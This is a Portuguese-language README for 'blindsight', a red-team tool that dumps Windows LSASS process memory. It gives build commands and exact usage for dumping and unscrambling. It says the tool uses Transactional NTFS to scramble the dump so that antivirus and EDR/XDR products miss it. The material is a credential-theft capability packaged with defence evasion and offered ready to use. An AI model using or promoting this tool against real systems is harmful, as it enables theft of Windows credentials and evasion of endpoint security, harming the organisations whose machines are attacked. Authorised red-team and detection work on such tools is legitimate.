
Ferramenta de Red Team para despejar a memória do LSASS, contornando contramedidas básicas.
"Não existe isso de sobrevivência do mais forte.
Sobrevivência do mais adequado, talvez.
Não importa se uma solução é ótima.
Tudo o que importa é se ela é melhor que a alternativa."-- Peter Watts, Blindsight (2006)
Ferramenta de red team para despejar a memória do LSASS, ignorando contramedidas básicas. Ela usa NTFS Transacional (API TxF) para embaralhar de forma transparente o despejo de memória, evitando acionar AV/EDR/XDR.
$ brew install mingw-w64
$ rustup target add x86_64-pc-windows-gnu
$ cargo build --release --target x86_64-pc-windows-gnu
Em uma janela do PowerShell com privilégios de administrador:
C:\> .\blindsight.exe [dump | file_to_unscramble.log]
Despejar memória do LSASS:
C:\> .\blindsight.exe
Desembaralhar o despejo de memória:
C:\> .\blindsight.exe 29ABE9Hy.log
[!CAUTION] Não teste em servidores de produção, pois acessar o LSASS pode causar instabilidade no sistema!